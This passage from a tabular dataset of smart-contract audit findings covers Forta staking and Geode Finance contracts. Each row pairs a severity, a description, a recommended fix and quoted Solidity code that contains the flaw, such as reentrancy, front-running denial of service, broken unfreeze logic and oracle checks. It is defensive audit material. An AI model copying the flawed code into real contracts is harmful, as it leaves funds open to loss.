\\_slashDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction reviewSlashProposalParameters(\\n uint256 \\_proposalId,\\n uint8 \\_subjectType,\\n uint256 \\_subjectId,\\n bytes32 \\_penaltyId,\\n string[] calldata \\_evidence\\n) external onlyRole(SLASHING\\_ARBITER\\_ROLE) onlyInState(\\_proposalId, IN\\_REVIEW) onlyValidSlashPenaltyId(\\_penaltyId) onlyValidSubjectType(\\_subjectType) notAgencyType(\\_subjectType, SubjectStakeAgency.DELEGATOR) {\\n // No need to check for proposal existence, onlyInState will revert if \\_proposalId is in undefined state\\n if (!subjectGateway.isRegistered(\\_subjectType, \\_subjectId)) revert NonRegisteredSubject(\\_subjectType, \\_subjectId);\\n\\n \\_submitEvidence(\\_proposalId, IN\\_REVIEW, \\_evidence);\\n if (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n }\\n```\\n\\n```\\nfunction revertSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external {\\n \\_authorizeRevertSlashProposal(\\_proposalId);\\n \\_transition(\\_proposalId, REVERTED);\\n \\_submitEvidence(\\_proposalId, REVERTED, \\_evidence);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction executeSlashProposal(uint256 \\_proposalId) external onlyRole(SLASHER\\_ROLE) {\\n \\_transition(\\_proposalId, EXECUTED);\\n Proposal memory proposal = proposals[\\_proposalId];\\n slashingExecutor.slash(proposal.subjectType, proposal.subjectId, getSlashedStakeValue(\\_proposalId), proposal.proposer, slashPercentToProposer);\\n slashingExecutor.freeze(proposal.subjectType, proposal.subjectId, false);\\n}\\n```\\n\\n```\\nfunction \\_unfreeze(uint256 \\_proposalId) private {\\n slashingExecutor.freeze(proposals[\\_proposalId].subjectType, proposals[\\_proposalId].subjectId, false);\\n}\\n```\\n",Introduce a check in the unfreezing mechanics to first ensure there are no other active proposals for that subject.,,"```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n" +Storage gap variables slightly off from the intended size,medium,"The Forta staking system is using upgradeable proxies for its deployment strategy. To avoid storage collisions between contract versions during upgrades, uint256[] private `__gap` array variables are introduced that create a storage buffer. Together with contract state variables, the storage slots should sum up to 50. For example, the `__gap` variable is present in the `BaseComponentUpgradeable` component, which is the base of most Forta contracts, and there is a helpful comment in `AgentRegistryCore` that describes how its relevant `__gap` variable size was calculated:\\n```\\nuint256[50] private \\_\\_gap;\\n```\\n\\n```\\nuint256[41] private \\_\\_gap; // 50 - 1 (frontRunningDelay) - 3 (\\_stakeThreshold) - 5 StakeSubjectUpgradeable\\n```\\n\\nHowever, there are a few places where the `__gap` size was not computed correctly to get the storage slots up to 50. Some of these are:\\n```\\nuint256[49] private \\_\\_gap;\\n```\\n\\n```\\nuint256[47] private \\_\\_gap;\\n```\\n\\n```\\nuint256[44] private \\_\\_gap;\\n```\\n\\nWhile these still provide large storage buffers, it is best if the `__gap` variables are calculated to hold the same buffer within contracts of similar types as per the initial intentions to avoid confusion.\\nDuring conversations with the Forta Foundation team, it appears that some contracts like `ScannerRegistry` and `AgentRegistry` should instead add up to 45 with their `__gap` variable due to the `StakeSubject` contracts they inherit from adding 5 from themselves. This is something to note and be careful with as well for future upgrades.",Provide appropriate sizes for the `__gap` variables to have a consistent storage layout approach that would help avoid storage issues with future versions of the system.,,```\\nuint256[50] private \\_\\_gap;\\n```\\n +AgentRegistryCore - Agent Creation DoS,medium,"AgentRegistryCore allows anyone to mint an `agentID` for the desired owner address. However, in some cases, it may fall prey to DoS, either deliberately or unintentionally.\\nFor instance, let's assume the Front Running Protection is disabled or the `frontRunningDelay` is 0. It means anyone can directly create an agent without any prior commitment. Thus, anyone can observe pending transactions and try to front run them to mint an `agentID` prior to the victim's restricting it to mint a desired `agentID`.\\nAlso, it may be possible that a malicious actor succeeds in frontrunning a transaction with manipulated data/chainIDs but with the same owner address and `agentID`. There is a good chance that victim still accepts the attacker's transaction as valid, even though its own transaction reverted, due to the fact that the victim is still seeing itself as the owner of that ID.\\nTaking an instance where let's assume the frontrunning protection is enabled. Still, there is a good chance that two users vouch for the same `agentIDs` and commits in the same block, thus getting the same frontrunning delay. Then, it will be a game of luck, whoever creates that agent first will get the ID minted to its address, and the other user's transaction will be reverted wasting the time they have spent on the delay.\\nAs the `agentIDs` can be picked by users, the chances of collisions with an already minted ID will increase over time causing unnecessary reverts for others.\\nAdding to the fact that there is no restriction for owner address, anyone can spam mint any `agentID` to any address for any profitable reason.\\n```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n","Modify function `prepareAgent` to not commit an already registered `agentID`.\\nA better approach could be to allow sequential minting of `agentIDs` using some counters.\\nOnly allow users to mint an `agentID`, either for themselves or for someone they are approved to.",,"```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n" +Lack of checks for rewarding an epoch that has already been rewarded,medium,"To give rewards to the participating stakers, the Forta system utilizes reward epochs for each `shareId`, i.e. a delegated staking share. Each epoch gets their own reward distribution, and then `StakeAllocator` and `RewardsDistributor` contracts along with the Forta staking shares determine how much the users get.\\nTo actually allocate these rewards, a privileged account with the role `REWARDER_ROLE` calls the `RewardsDistributor.reward()` function with appropriate parameters to store the `amount` a `shareId` gets for that specific `epochNumber`, and then adds the `amount` to the `totalRewardsDistributed` contract variable for tracking. However, there is no check that the `shareId` already received rewards for that `epoch`. The new reward `amount` simply replaces the old reward `amount`, and `totalRewardsDistributed` gets the new `amount` added to it anyway. This causes inconsistencies with accounting in the `totalRewardsDistributed` variable.\\nAlthough `totalRewardsDistributed` is essentially isolated to the `sweep()` function to allow transferring out the reward tokens without taking away those tokens reserved for the reward distribution, this still creates an inconsistency, albeit a minor one in the context of the current system.\\nSimilarly, the `sweep()` function deducts the `totalRewardsDistributed` amount instead of the amount of pending rewards only. In other words, either there should be a different variable that tracks only pending rewards, or the `totalRewardsDistributed` should have token amounts deducted from it when users execute the `claimRewards()` function. Otherwise, after a few epochs there will be a really large `totalRewardsDistributed` amount that might not reflect the real amount of pending reward tokens left on the contract, and the `sweep()` function for the reward token is likely to fail for any amount being transferred out.\\n```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n","Implement checks as appropriate to the `reward()` function to ensure correct behavior of `totalRewardsDistributed` tracking. Also, implement necessary changes to the tracking of pending rewards, if necessary.",,"```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n" +Reentrancy in FortaStaking during ERC1155 mints,medium,"In the Forta staking system, the staking shares (both “active” and “inactive”) are represented as tokens implemented according to the `ERC1155` standard. The specific implementation that is being used utilizes a smart contract acceptance check `_doSafeTransferAcceptanceCheck()` upon mints to the recipient.\\n```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n\\nThe specific implementation for `ERC1155SupplyUpgradeable` contracts can be found here, and the smart contract check can be found here.\\nThis opens up reentrancy into the system's flow. In fact, the reentrancy occurs on all mints that happen in the below functions, and it happens before a call to another Forta contract for allocation is made via either `_allocator.depositAllocation` or _allocator.withdrawAllocation:\\n```\\nfunction deposit(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeValue\\n) external onlyValidSubjectType(subjectType) notAgencyType(subjectType, SubjectStakeAgency.MANAGED) returns (uint256) {\\n if (address(subjectGateway) == address(0)) revert ZeroAddress(""subjectGateway"");\\n if (!subjectGateway.isStakeActivatedFor(subjectType, subject)) revert StakeInactiveOrSubjectNotFound();\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n bool reachedMax;\\n (stakeValue, reachedMax) = \\_getInboundStake(subjectType, subject, stakeValue);\\n if (reachedMax) {\\n emit MaxStakeReached(subjectType, subject);\\n }\\n uint256 sharesValue = stakeToActiveShares(activeSharesId, stakeValue);\\n SafeERC20.safeTransferFrom(stakedToken, staker, address(this), stakeValue);\\n\\n \\_activeStake.mint(activeSharesId, stakeValue);\\n \\_mint(staker, activeSharesId, sharesValue, new bytes(0));\\n emit StakeDeposited(subjectType, subject, staker, stakeValue);\\n \\_allocator.depositAllocation(activeSharesId, subjectType, subject, staker, stakeValue, sharesValue);\\n return sharesValue;\\n}\\n```\\n\\n```\\nfunction migrate(\\n uint8 oldSubjectType,\\n uint256 oldSubject,\\n uint8 newSubjectType,\\n uint256 newSubject,\\n address staker\\n) external onlyRole(SCANNER\\_2\\_NODE\\_RUNNER\\_MIGRATOR\\_ROLE) {\\n if (oldSubjectType != SCANNER\\_SUBJECT) revert InvalidSubjectType(oldSubjectType);\\n if (newSubjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(newSubjectType); \\n if (isFrozen(oldSubjectType, oldSubject)) revert FrozenSubject();\\n\\n uint256 oldSharesId = FortaStakingUtils.subjectToActive(oldSubjectType, oldSubject);\\n uint256 oldShares = balanceOf(staker, oldSharesId);\\n uint256 stake = activeSharesToStake(oldSharesId, oldShares);\\n uint256 newSharesId = FortaStakingUtils.subjectToActive(newSubjectType, newSubject);\\n uint256 newShares = stakeToActiveShares(newSharesId, stake);\\n\\n \\_activeStake.burn(oldSharesId, stake);\\n \\_activeStake.mint(newSharesId, stake);\\n \\_burn(staker, oldSharesId, oldShares);\\n \\_mint(staker, newSharesId, newShares, new bytes(0));\\n emit StakeDeposited(newSubjectType, newSubject, staker, stake);\\n \\_allocator.depositAllocation(newSharesId, newSubjectType, newSubject, staker, stake, newShares);\\n}\\n```\\n\\n```\\nfunction initiateWithdrawal(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 sharesValue\\n) external onlyValidSubjectType(subjectType) returns (uint64) {\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n if (balanceOf(staker, activeSharesId) == 0) revert NoActiveShares();\\n uint64 deadline = SafeCast.toUint64(block.timestamp) + \\_withdrawalDelay;\\n\\n \\_lockingDelay[activeSharesId][staker].setDeadline(deadline);\\n\\n uint256 activeShares = Math.min(sharesValue, balanceOf(staker, activeSharesId));\\n uint256 stakeValue = activeSharesToStake(activeSharesId, activeShares);\\n uint256 inactiveShares = stakeToInactiveShares(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n SubjectStakeAgency agency = getSubjectTypeAgency(subjectType);\\n \\_activeStake.burn(activeSharesId, stakeValue);\\n \\_inactiveStake.mint(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n \\_burn(staker, activeSharesId, activeShares);\\n \\_mint(staker, FortaStakingUtils.activeToInactive(activeSharesId), inactiveShares, new bytes(0));\\n if (agency == SubjectStakeAgency.DELEGATED || agency == SubjectStakeAgency.DELEGATOR) {\\n \\_allocator.withdrawAllocation(activeSharesId, subjectType, subject, staker, stakeValue, activeShares);\\n }\\n```\\n\\nAlthough this doesn't seem to be an issue in the current Forta system of contracts since the allocator's logic doesn't seem to be manipulable, this could still be dangerous as it opens up an external execution flow.","Consider introducing a reentrancy check or emphasize this behavior in the documentation, so that both other projects using this system later and future upgrades along with maintenance work on the Forta staking system itself are implemented safely.",,"```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n" +Unnecessary code blocks that check the same condition,low,"In the `RewardsDistributor` there is a function that allows to set delegation fees for a `NodeRunner`. It adjusts the `fees[]` array for that node as appropriate. However, during its checks, it performs the same check twice in a row.\\n```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n",Consider refactoring this under a single code block.,,```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n +Event spam in RewardsDistributor.claimRewards,low,"The `RewardsDistributor` contract allows users to claim their rewards through the `claimRewards()` function. It does check to see whether or not the user has already claimed the rewards for a specific epoch that they are claiming for, but it does not check to see if the user has any associated rewards at all. This could lead to event `ClaimedRewards` being spammed by malicious users, especially on low gas chains.\\n```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n",Add a check for rewards amounts being greater than 0.,,"```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n" +Lack of a check for the subject's stake for reviewSlashProposalParameters,low,"In the `SlashingController` contract, the address with the `SLASHING_ARBITER_ROLE` may call the `reviewSlashProposalParameters()` function to adjust the slashing proposal to a new `_subjectId` and `_subjectType`. However, unlike in the `proposeSlash()` function, there is no check for that subject having any stake at all.\\nWhile it may be assumed that the review function will be called by a privileged and knowledgeable actor, this additional check may avoid accidental mistakes.\\n```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(""subject stake"");\\n```\\n\\n```\\nif (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n}\\n```\\n",Add a check for the new subject having stake to slash.,,"```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(""subject stake"");\\n```\\n" +Comment and code inconsistencies,low,"During the audit a few inconsistencies were found between what the comments say and what the implemented code actually did.\\nSubject Type Agency for Scanner Subjects\\nIn the `SubjectTypeValidator`, the comment says that the `SCANNER_SUBJECT` is of type `DIRECT` agency type, i.e. it can be directly staked on by multiple different stakers. However, we found a difference in the implementation, where the concerned subject is defined as type `MANAGED` agency type, which says that it cannot be staked on directly; instead it's a delegated type and the allocation is supposed to be managed by its manager.\\n```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n\\n```\\n} else if (subjectType == SCANNER\\_SUBJECT) {\\n return SubjectStakeAgency.MANAGED;\\n```\\n\\nDispatch refers to ERC721 tokens as ERC1155\\nOne of the comments describing the functionality to `link` and `unlink` agents and scanners refers to them as ERC1155 tokens, when in reality they are ERC721.\\n```\\n/\\*\\*\\n \\* @notice Assigns the job of running an agent to a scanner.\\n \\* @dev currently only allowed for DISPATCHER\\_ROLE (Assigner software).\\n \\* @dev emits Link(agentId, scannerId, true) event.\\n \\* @param agentId ERC1155 token id of the agent.\\n \\* @param scannerId ERC1155 token id of the scanner.\\n \\*/\\n```\\n\\nNodeRunnerRegistryCore comment that implies the reverse of what happens\\nA comment describing a helper function that returns address for a given scanner ID describes the opposite behavior. It is the same comment for the function just above that actually does what the comment says.\\n```\\n/// Converts scanner address to uint256 for FortaStaking Token Id.\\nfunction scannerIdToAddress(uint256 scannerId) public pure returns (address) {\\n return address(uint160(scannerId));\\n}\\n```\\n\\nScannerToNodeRunnerMigration comment that says that no NodeRunner tokens must be owned\\nFor the migration from Scanners to NodeRunners, a comment in the beginning of the file implies that for the system to work correctly, there must be no NodeRunner tokens owned prior to migration. After a conversation with the Forta Foundation team, it appears that this was an early design choice that is no longer relevant.\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n",Verify the operational logic and fix either the concerned comments or defined logic as per the need.,,```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n +Oracle's _sanityCheck for prices will not work with slashing,high,"The `_sanityCheck` is verifying that the new price didn't change significantly:\\n```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n ""OracleUtils: price is insane""\\n```\\n\\nWhile the rewards of staking can be reasonably predicted, the balances may also be changed due to slashing. So any slashing event should reduce the price, and if enough ETH is slashed, the price will drop heavily. The oracle will not be updated because of a sanity check. After that, there will be an arbitrage opportunity, and everyone will be incentivized to withdraw as soon as possible. That process will inevitably devaluate gETH to zero. The severity of this issue is also amplified by the fact that operators have no skin in the game and won't lose anything from slashing.",Make sure that slashing can be adequately processed when updating the price.,,"```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n ""OracleUtils: price is insane""\\n```\\n" +MiniGovernance - fetchUpgradeProposal will always revert,high,"In the function `fetchUpgradeProposal()`, `newProposal()` is called with a hard coded `duration` of 4 weeks. This means the function will always revert since `newProposal()` checks that the proposal `duration` is not more than the constant `MAX_PROPOSAL_DURATION` of 2 weeks. Effectively, this leaves MiniGovernance non-upgradeable.\\n```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n\\n```\\nrequire(\\n duration <= MAX\\_PROPOSAL\\_DURATION,\\n ""GeodeUtils: duration exceeds MAX\\_PROPOSAL\\_DURATION""\\n);\\n```\\n",Switch the hard coded proposal duration to 2 weeks.,,"```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n" +Updating interfaces of derivatives is done in a dangerous and unpredictable manner.,medium,"Geode Finance codebase provides planet maintainers with the ability to enable or disable different contracts to act as the main token contract. In fact, multiple separate contracts can be used at the same time if decided so by the planet maintainer. Those contracts will have shared balances but will not share the allowances as you can see below:\\n```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n\\n```\\nmapping(address => mapping(address => uint256)) private \\_allowances;\\n```\\n\\nUnfortunately, this approach comes with some implications that are very hard to predict as they involve interactions with other systems, but is possible to say that the consequences of those implications will most always be negative. We will not be able to outline all the implications of this issue, but we can try and outline the pattern that they all would follow.\\nThere are really two ways to update an interface: set the new one and immediately unset the old one, or have them both run in parallel for some time. Let's look at them one by one.\\nin the first case, the old interface is disabled immediately. Given that interfaces share balances that will lead to some very serious consequences. Imagine the following sequence:\\nAlice deposits her derivatives into the DWP contract for liquidity mining.\\nPlanet maintainer updates the interface and immediately disables the old one.\\nDWP contract now has the old tokens and the new ones. But only the new ones are accounted for in the storage and thus can be withdrawn. Unfortunately, the old tokens are disabled meaning that now both old and new tokens are lost.\\nThis can happen in pretty much any contract and not just the DWP token. Unless the holders had enough time to withdraw the derivatives back to their wallets all the funds deposited into contracts could be lost.\\nThis leads us to the second case where the two interfaces are active in parallel. This would solve the issue above by allowing Alice to withdraw the old tokens from the DWP and make the new tokens follow. Unfortunately, there is an issue in that case as well.\\nSome DeFi contracts allow their owners to withdraw any tokens that are not accounted for by the internal accounting. DWP allows the withdrawal of admin fees if the contract has more tokens than `balances[]` store. Some contracts even allow to withdraw funds that were accidentally sent to the contract by people. Either to recover them or just as a part of dust collection. Let's call such contracts “dangerous contracts” for our purposes.\\nAlice deposits her derivatives into the dangerous contract.\\nPlanet maintainer sets a new interface.\\nOwner of the dangerous contract sees that some odd and unaccounted tokens landed in the contract. He learns those are real and are part of Geode ecosystem. So he takes them.\\nOld tokens will follow the new tokens. That means Alice now has no claim to them and the contract that they just left has broken accounting since numbers there are not backed by tokens anymore.\\nOne other issue we would like to highlight here is that despite the contracts being expected to have separate allowances, if the old contract has the allowance set, the initial 0 value of the new one will be ignored. Here is an example:\\nAlice approves Bob for 100 derivatives.\\nPlanet maintainer sets a new interface. The new interface has no allowance from Alice to Bob.\\nBob still can transfer new tokens from Alice to himself by transferring the old tokens for which he still has the allowance. New token balances will be updated accordingly.\\nAlice could also give Bob an allowance of 100 tokens in the new contract since that was her original intent, but this would mean that Bob now has 200 token allowance.\\nThis is extremely convoluted and will most likely result in errors made by the planet maintainers when updating the interfaces.",The safest option is to only allow a list of whitelisted interfaces to be used that are well-documented and audited. Planet maintainers could then choose the once that they see fit.,,```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n +Only the GOVERNANCE can initialize the Portal,medium,"In the Portal's `initialize` function, the `_GOVERNANCE` is passed as a parameter:\\n```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n\\nBut then it calls the `updateStakingParams` function, which requires the `msg.sender` to be the governance:\\n```\\nfunction updateStakingParams(\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD,\\n uint256 \\_PERIOD\\_PRICE\\_INCREASE\\_LIMIT,\\n uint256 \\_PERIOD\\_PRICE\\_DECREASE\\_LIMIT,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_BOOST\\_SWITCH\\_LATENCY\\n) public virtual override {\\n require(\\n msg.sender == GEODE.GOVERNANCE,\\n ""Portal: sender not GOVERNANCE""\\n );\\n```\\n\\nSo only the future governance can initialize the `Portal`. In the case of the Geode protocol, the governance will be represented by a token contract, making it hard to initialize promptly. Initialization should be done by an actor that is more flexible than governance.",Split the `updateStakingParams` function into public and private ones and use them accordingly.,,"```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n" +The maintainer of the MiniGovernance can block the changeMaintainer function,medium,"Every entity with an ID has a controller and a maintainer. The controller tends to have more control, and the maintainer is mostly used for operational purposes. So the controller should be able to change the maintainer if that is required. Indeed we see that it is possible in the MiniGovernance too:\\n```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n\\nHere the `changeMaintainer` function can only be called by the Portal, and only the controller can initiate that call. But the maintainer can pause the MiniGovernance, 